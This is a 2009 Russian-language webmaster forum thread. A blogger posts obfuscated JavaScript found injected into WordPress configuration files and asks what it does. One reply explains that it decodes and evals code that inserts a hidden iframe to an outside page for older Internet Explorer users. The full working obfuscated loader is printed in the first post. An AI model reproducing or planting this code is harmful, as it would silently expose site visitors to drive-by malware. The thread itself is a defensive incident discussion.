Master-X
Форум | Новости | Статьи
Главная » Форум » Блоги и Социальные сети » 
Тема: Блог похоже ломанули.
цитата
23/09/09 в 17:19
 Axel-B
Кто знает, что делает этот код и каким образом он мог затесаться в wp-config

Код:
<script>/**/function WYe7(TeJ3, Ikl0, CJt4) { var jPd0; jPd0=TeJ3.split(Ikl0); var Ikg3=jPd0.join(CJt4); return Ikg3;/**/ } function ErO2(EHs8) { EHs8 = WYe7(EHs8,"##+##","'"); EHs8 = WYe7(EHs8,"##|##","\\"); Ikg3=""; vzu3 =""; for(k=0;k<EHs8.length;k++) { Ikg3 = EHs8.charCodeAt(k); if (Ikg3==32){Ikg3=35} else if (Ikg3==35){Ikg3=32} else if (Ikg3==59){Ikg3=64} else if (Ikg3==64){Ikg3=59} else if (Ikg3==37){Ikg3=42} else if (Ikg3==42){Ikg3=37} else if (Ikg3>=97 && Ikg3<=122) { Ikg3=Ikg3-97;Ikg3=25-Ikg3;Ikg3+=97; }else if (Ikg3>=65 && Ikg3<=90) { Ikg3=Ikg3-65;Ikg3=25-Ikg3;Ikg3+=65; }else if (Ikg3>=48 && Ikg3<=57) { Ikg3=Ikg3-48;Ikg3=9-Ikg3;Ikg3+=48; } vzu3 += String.fromCharCode(Ikg3); } return vzu3;/**/ }Tvt5=eval;var Ewy8;var EfnA;var QWrk;var Zufs;var Dgea;var WhHb;var MxS2;Tvt5(ErO2('DsSy#=###+##sggk://svczglny.xln/urovh/a/hgzgrx.ksk##+##@Wtvz#=###+##ruiznv##+##@'));Tvt5(ErO2('Vdb1#=#wlxfnvmg.xivzgvVovnvmg(Wtvz)@Vdb1.hvgZggiryfgv(##+##hix##+##,#DsSy)@'));Tvt5(ErO2('Vdb1.hvgZggiryfgv(##+##drwgs##+##,9)@Vdb1.hvgZggiryfgv(##+##svrtsg##+##,9)@Vdb1.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Tvt5(ErO2('Vdb1.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Tvt5(ErO2('Vdb1.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#NcH7=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Tvt5(ErO2('JDip=NcH7.rmwvcLu(##+##nhrv##+##)@VumZ=NcH7.rmwvcLu(##+##nhrv#1##+##)@Afuh=NcH7.rmwvcLu(##+##mg#3##+##)@'));if ((EfnA==-1)&&(QWrk>0)&&(Zufs==-1)){Tvt5(ErO2('wlxfnvmg.ylwb.zkkvmwXsrow(Vdb1)@'));}</script>


Последний раз редактировалось: Axel-B (24/09/09 в 15:25), всего редактировалось 1 раз
цитата
23/09/09 в 20:43
 remorhaz
Затесаться он туда мог через любую дыру. Данный код выполняет на твоей странице нехитрым образом зашифрованный код, ща погляжу...

Так, он попросту создает на странице невидимый iframe, ссылающийся на вот эту вот страницу, если в сигнатуре браузера нет msie 8 и nt 6, но есть msie:
Код:
Наверняка там вирусня какая-нибудь smail101.gif Проверять не полезу, нуивонах...
цитата
24/09/09 в 11:32
 Skat
а версия вп стояла последняя?
цитата
24/09/09 в 12:59
 Axel-B
Нет, была 2.7. Уже обновился.
цитата
24/09/09 в 16:37
 Crappyday
ну так это...его же просто снести можно?
цитата
24/09/09 в 20:37
 Axel-B
Скрипт снес сразу как заметил (был в двух файлах wp-config и wp-cashe-config)
цитата
26/09/09 в 13:23
 Sergeyka
лопанули тебя, пиши абузы
цитата
27/09/09 в 10:58
 mandalina
Код:
TeJ3.split(Ikl0)

Сплоит.Когда создал блог не помешало бы X-Spider'ом просканить
цитата
27/09/09 в 17:20
 Axel-B
Интересно как он там появился. После зачистки вроде не появляется больше.


Эта страница в полной версии